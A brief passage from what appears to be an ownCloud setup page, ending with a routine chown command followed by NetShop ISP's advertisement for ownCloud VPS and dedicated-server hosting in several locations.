chown -R www-data. owncloud

Get OwnCloud as Virtual or Dedicated Server

NetShop ISP offers OwnCloud as a Virtual Private Server (VPS) or you can install it on a Bare-metal Dedicated Server.

Minimum VPS Plan: 1 vCPU, 512GB RAM, 20GB SSD. Locations: Cyprus, Malta, United Kingdom, Netherlands, Singapore

Minimum Specs Dedicated Server: Check our Offers to find the server with the best pricing that matches your budget.